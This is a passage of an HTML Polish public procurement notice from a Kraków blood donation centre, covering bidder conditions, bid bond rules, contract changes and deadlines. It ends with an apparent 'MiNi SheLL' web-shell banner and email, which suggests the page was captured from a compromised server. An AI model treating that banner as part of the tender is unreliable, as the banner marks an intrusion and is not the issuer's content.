1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W zakresie warunku dotyczącego zdolności technicznej lub zawodowej odnośnie niezbędnego doświadczenia Wykonawcy, Zamawiający wymaga, aby Wykonawca wykazał, że w okresie ostatnich 5 lat przed upływem terminu składania ofert w przedmiotowym postępowaniu, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy – w tym okresie, zrealizował w sposób należyty minimum trzy zamówienia polegające na świadczeniu usługi polegającej na pełnieniu funkcji inwestora zastępczego lub zarządzaniu procesem inwestycyjnym oraz pełnienia funkcji inspektorów nadzoru dla inwestycji budowlanej, gdzie wartość robót budowlanych nie była niższa niż 10 000 000,00 zł każda (słownie: dziesięć milionów złotych). Uwaga: Zamawiający nie dopuszcza możliwości sumowania wartości wykonanych usług w ramach wielu umów, w celu uzyskania wartości zamówienia wymaganej do wykazania spełniania niniejszego warunku. W przypadku wspólnego ubiegania się o udzielenie zamówienia, warunek zostanie uznany za spełniony, jeżeli przynajmniej jeden z wykonawców spełnia samodzielnie warunek niezbędnego doświadczenia wskazany przez Zamawiającego. Jeżeli jakakolwiek wartość dotycząca powyższego warunku wyrażona będzie w walucie obcej, Zamawiający przeliczy tę wartość w oparciu o średni kurs walut Narodowego Banku Polskiego obowiązujący w dniu publikacji postępowania.<br/>W zakresie warunku dotyczącego zdolności technicznej lub zawodowej odnośnie wykształcenia, doświadczenia, kwalifikacji zawodowych osób skierowanych do realizacji zamówienia, Zamawiający wymaga, aby Wykonawca dysponował osobami zdolnymi do należytego wykonania zamówienia, w szczególności powołał Zespół Nadzoru w następującym składzie: <br/>Jedna osoba pełniąca funkcję Kierownika Zespołu Nadzoru odpowiedzialna za nadzór merytoryczny i organizacyjny nad realizacją robót budowalnych ze strony Wykonawcy, kontrolę i koordynowanie pracy personelu Wykonawcy, kontrolę formalną i merytoryczną dokumentów opracowanych lub weryfikowanych przez Wykonawcę, będąca jednocześnie osobą odpowiedzialną za nadzór inwestorski w zakresie branży konstrukcyjno-budowlanej, posiadająca minimum 5 letnie doświadczenie w pełnieniu funkcji Kierownika / Koordynatora / Głównego Inspektora lub innej funkcji nadzorczej przy realizacji co najmniej 2 projektów / inwestycji budowlanych w fazie ich realizacji i odbioru o łącznej wartości tych wykazanych dwóch projektów / inwestycji budowlanych co najmniej 10 000 000,00 zł brutto, <br/>Co najmniej jedną osobą przeznaczoną do pełnienia funkcji nadzoru inwestorskiego w zakresie branży instalacyjnej w zakresie instalacji i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, posiadającą co najmniej trzy letnie doświadczenie zawodowe liczone od dnia uzyskania uprawnień, posiadającą uprawnienia budowlane bez ograniczeń w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, która pełniła funkcję nadzoru inwestorskiego przy realizacji co najmniej 2 projektów / inwestycji budowlanych w fazie ich realizacji i odbioru o łącznej wartości tych wykazanych dwóch projektów / inwestycji budowalnych co najmniej 10 000 000,00 zł brutto;<br/>Co najmniej jedną osobą przeznaczoną do pełnienia funkcji nadzoru inwestorskiego w zakresie branży instalacyjnej w zakresie instalacji i urządzeń: elektrycznych i elektroenergetycznych, posiadającą co najmniej trzy letnie doświadczenie zawodowe liczone od dnia uzyskania uprawnień, posiadającą uprawnienia budowlane bez ograniczeń w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych, która pełniła funkcję nadzoru inwestorskiego przy realizacji co najmniej 2 projektów / inwestycji budowlanych w fazie ich realizacji i odbioru o łącznej wartości tych wykazanych dwóch projektów / inwestycji budowlanych co najmniej 10 000 000,00 zł brutto;<br/>Co najmniej jedną osobą przeznaczoną do pełnienia funkcji nadzoru inwestorskiego w zakresie branży instalacyjnej w zakresie instalacji i urządzeń telekomunikacyjnych, posiadającą co najmniej trzy letnie doświadczenie zawodowe liczone od dnia uzyskania uprawnień, posiadającą uprawnienia budowlane bez ograniczeń w zakresie instalacji i urządzeń telekomunikacyjnych, która pełniła funkcję nadzoru inwestorskiego przy realizacji co najmniej 2 projektów / inwestycji budowlanych w fazie ich realizacji i odbioru o łącznej wartości tych wykazanych dwóch projektów / inwestycji budowlanych co najmniej 10 000 000,00 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w pkt. 1.1., w zakresie wskazanym przez Zamawiającego.<br/>Oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt. 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, o której mowa w ustawie z dnia 16 lutego 2007r. – o ochronie konkurencji i konsumentów (tekst jedn. Dz.U. 2021, poz. 275) z innym wykonawcą, który złożył odrębną ofertę albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy ubiegającego się o udzielenie zamówienia publicznego i należącego to tej samej grupy kapitałowej.<br/>Odpis lub informację z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej Rzeczypospolitej Polskiej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji – wystawiony nie wcześniej niż 3 miesiące przed złożeniem.<br/>Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w pkt. 1.1., w zakresie art. 109 ust. 1 pkt.4, 7-8 i 10 ustawy.<br/>Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu wskazanego w pkt. 2.4. lit. a SWZ, składa dokument wystawiony w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu lub dokumentów, o których mowa w pkt. 7 Sekcji X SWZ, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, złożone pod przysięgą lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy – sporządzony nie wcześniej niż 3 miesiące przed złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunku opisanego w pkt. 2 Sekcji IX SWZ – wykaz usług wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wzór wykazu stanowi Załącznik nr 4 do SWZ.<br/>W celu potwierdzenia spełniania warunku opisanego w pkt. 3 Sekcji IX SWZ – wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do należytego wykonania zamówienia, zakresu wykonywanych przez nie czynności, a także wskazania podstaw dysponowania tymi osobami. Wzór wykazu stanowi Załącznik nr 5 do SWZ. <br/>Zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia albo inny środek dowodowy potwierdzający, że wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów – dotyczy Wykonawców polegających na zasobach podmiotów udostępniających w celu potwierdzenia spełniania warunku określonego w pkt. 2 lub 3 Sekcji IX SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Składając ofertę Wykonawca zobowiązany jest wnieść wadium w wysokości 8 000,00 zł (słownie: osiem tysięcy złotych). Wadium musi być wniesione przed upływem terminu składania ofert. Wadium może być wnoszone w jednej lub kilku następujących formach: W pieniądzu na konto Zamawiającego (decyduje termin uznania rachunku Zamawiającego): 23 1130 1150 0012 1266 5320 0004 (Bank Gospodarstwa Krajowego). W poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym. W gwarancjach bankowych. W gwarancjach ubezpieczeniowych. W poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. Jeżeli wadium zostanie wniesione w pieniądzu, na poleceniu przelewu należy wpisać: „Wadium – postępowanie nr ZP-05/22” Jeżeli wadium zostanie wniesione w innej formie niż w pieniądzu, wymagane jest dołączenie do oferty oryginału dokumentu elektronicznego wystawionego na rzecz Zamawiającego - Beneficjenta: Regionalne Centrum Krwiodawstwa i Krwiolecznictwa w Krakowie, ul. Rzeźnicza 11, 31-540 Kraków. Dokumenty muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą. Dokumenty wadialne muszą być wystawione w języku polskim. Siedziba instytucji wystawiającej gwarancję lub poręczenie musi być zlokalizowana w państwie członkowskim Unii Europejskiej lub w państwie, które jest stroną Porozumienia Światowej Organizacji Handlu w sprawie zamówień rządowych lub innych umów międzynarodowych, których strona jest Unia Europejska. Jeżeli gwarancja lub poręczenie ma zabezpieczać ofertę wykonawców wspólnie ubiegających się o udzielenie zamówienia, udzielenie gwarancji lub poręczenia powinno nastąpić w imieniu wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Niezbędne jest wskazanie w treści gwarancji lub poręczenia wszystkich Wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia i wskazanie, który z Wykonawców wspólnie ubiegających się o udzielenie zamówienia jest podmiotem wnoszącym wadium. Dochodzenie roszczenia z tytułu wadium wniesionego w innej formie niż w pieniądz nie może być utrudnione, dlatego w treści dokumentu wadialnego powinna znaleźć się klauzula stanowiąca, że wszystkie spory odnośnie wadium będą rozstrzygane zgodnie z prawem polskim przez sądy polskie chyba że wynika to z przepisów prawa. Przedłużenie ważności wadium nie może być uzależnione od zwrotu dokumentu. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego. Gwarancje lub poręczenia powinny być nieodwołalne, bezwarunkowe i płatne na pierwsze żądanie Beneficjenta zgłoszone w terminie związania ofertą do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 pkt. 1-3 ustawy. Przy wnoszeniu wadium Wykonawca winien powołać się na numer i nazwę sprawy, której wadium dotyczy. Zamawiający odrzuci ofertę jeżeli wadium nie zostanie wniesione lub zostanie wniesione w sposób nieprawidłowy. Zamawiający zwróci wadium niezwłocznie, nie później jednak niż w terminie 7 dni od: Upływu terminu związania ofertą. Zawarcia umowy w sprawie zamówienia publicznego. Unieważnienia postępowania za wyjątkiem sytuacji, gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. Zamawiający zwróci wadium niezwłocznie, nie później niż w terminie 7 dni od dnia złożenia wniosku przez Wykonawcę: Który wycofał ofertę przed upływem terminu składania ofert w postępowaniu. Którego oferta została odrzucona. Po wyborze oferty najkorzystniejszej, z wyjątkiem Wykonawcy którego oferta została wybrana jako najkorzystniejsza Po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia postępowania albo nie upłynął termin do jego wniesienia (...) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego ustanawiają Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający, poza możliwością zmiany zawartej umowy na podstawie art. 455 ust. 1 pkt 2, 3, 4, art. 455 ust. 2 ustawy, przewiduje również możliwość dokonywania zmian postanowień zawartej umowy, także w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy na zasadach i w przypadkach określonych w niniejszym paragrafie. Zamawiający przewiduje zmianę umowy w zakresie zmiany terminów jej wykonania w przypadkach: zmiany terminu obowiązywania umowy o wykonanie dokumentacji projektowej i wykonania robot budowlanych. Niniejsza umowa ulega odpowiednio przedłużeniu/ skróceniu w przypadku wydłużenia/ skrócenia obowiązywania umowy na wykonanie projektu i robót budowlanych do czasu realizacji inwestycji. Powyższe oznacza, iż gdy Zamawiający zmuszony będzie rozwiązać umowę na wykonanie projektu i robót budowlanych przed jej wykonaniem niniejsza umowa nie ulega rozwiązaniu. Zmiany będącej następstwem działania lub braku działania organów administracji i innych podmiotów o kompetencjach zbliżonych do organów administracji w szczególności eksploatatorów infrastruktury oraz właścicieli gruntów pod inwestycję, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności: przekroczenie zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji nie ma - typowych w danych okolicznościach, terminów wydawania przez organy administracji lub inne podmioty decyzji, zezwoleń, uzgodnień itp., Odmowy wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę, w tym odmowy udostępnienia przez właścicieli nieruchomości do celów realizacji inwestycji, Zmiany spowodowanej przez zagrożenie wpływające na bezpieczeństwo życia, zdrowia, mierna, lub robót na terenie budowy, lub sąsiadujących nieruchomości, na skutek czego wydano Wykonawcy Robót polecenie wstrzymania robót, usunięcia wad lub podjęcia innych czynności w celu wyeliminowania lub zmniejszenia zagrożenia, jeśli konieczność polecenia wynikła z przyczyn leżących po stronie Zamawiającego, W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 2 termin wykonania niniejszej umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania przedmiotu Umowy z Wykonawcą w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. Wykonawca nie może żądać zwiększenia wynagrodzenia lub zwrotu innych kosztów bezpośrednich lub pośrednich spowodowanych przestojem lub dłuższym niż przewidywanym czasem wykonywania niniejszej umowy. Zamawiający przewiduje zmianę umowy spowodowanej następującymi okolicznościami:<br/>zmianą powszechnie obowiązujących przepisów prawa lub wynikających z prawomocnych orzeczeń lub ostatecznych aktów administracyjnych właściwych organów - w takim zakresie, w jakim będzie to niezbędne w celu dostosowania postanowień Umowy do zaistniałego stanu prawnego lub faktycznego. W takim przypadku zmianie może ulec, np. termin wykonywania umowy, zakres przedmiotu Umowy lub wynagrodzenie Wykonawcy. siłą wyższą - rozumianą jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części. W razie wystąpienia siły wyższej Strony Umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałego na skutek działania siły wyższej. (...) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platformie Zakupowej Regionalnego Centrum Krwiodawstwa i Krwiolecznictwa w Krakowie pod adresem Profil Nabywcy - Regional-ne Centrum Krwiodawstwa i Krwiolecznictwa w Krakowie (platformazakupowa.pl)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-07</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com